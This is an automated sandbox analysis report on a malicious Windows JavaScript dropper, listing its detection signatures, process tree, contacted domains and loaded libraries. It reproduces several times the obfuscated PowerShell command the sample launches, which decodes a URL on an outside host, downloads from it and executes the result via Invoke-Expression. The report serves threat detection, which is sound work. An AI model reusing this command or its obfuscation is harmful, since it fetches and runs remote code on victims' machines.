Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
js (2).js

Overview

General Information

Sample name:js (2).js
Analysis ID:1664663
MD5:57facd3bff711855391b43b671622e00
SHA1:d492092628803eae1048a82ddd37be682bdcfb58
SHA256:ce3d59c9b275e385dfbb65fd8b58165f8ed78a55d324f7a6a765c48e32f6202c
Tags:185-250-151-155jsuser-JAMESWT_WT
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Creates processes via WMI
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 7896 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • conhost.exe (PID: 7972 cmdline: conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx) MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7992 cmdline: powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", ProcessId: 7896, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js", ProcessId: 7896, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx), CommandLine: powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7972, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx), ProcessId: 7992, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: js (2).jsVirustotal: Detection: 40%Perma Link
Source: js (2).jsReversingLabs: Detection: 44%
Source: Submited SampleNeural Call Log Analysis: 98.0%
Source: Binary string: CallSite.Target.pdbns] source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbEw source: powershell.exe, 00000002.00000002.1380483022.000002A4AE935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1382086536.000002A4AEC50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb(IKEx source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbs.dll source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000002.00000002.1361264675.000002A49488E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbU source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb pr8 source: powershell.exe, 00000002.00000002.1380483022.000002A4AE909000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: 2berumerb.shop
Source: global trafficDNS traffic detected: DNS query: c.pki.goog
Source: powershell.exe, 00000002.00000002.1361924813.000002A497C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2berumerb.shop
Source: powershell.exe, 00000002.00000002.1361924813.000002A497C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2berumerb.shop/1.php?s=flibabc22
Source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2berumerb.shop/1.php?s=flibabc22P)
Source: powershell.exe, 00000002.00000002.1376949639.000002A4A6493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1361924813.000002A497EE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1361924813.000002A496421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1361924813.000002A496421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1361924813.000002A49704C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1376949639.000002A4A6493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3C7F19662_2_00007FFC3C7F1966
Source: js (2).jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal72.expl.winJS@4/3@2/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f42giumt.42x.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: js (2).jsVirustotal: Detection: 40%
Source: js (2).jsReversingLabs: Detection: 44%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: CallSite.Target.pdbns] source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbEw source: powershell.exe, 00000002.00000002.1380483022.000002A4AE935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1382086536.000002A4AEC50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb(IKEx source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbs.dll source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.1380483022.000002A4AE870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000002.00000002.1361264675.000002A49488E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbU source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1380483022.000002A4AE915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb pr8 source: powershell.exe, 00000002.00000002.1380483022.000002A4AE909000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3C727135 push ebx; retf 2_2_00007FFC3C72718A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3C72717C push ebx; retf 2_2_00007FFC3C72718A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3C7256FD pushad ; retf 2_2_00007FFC3C725749

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
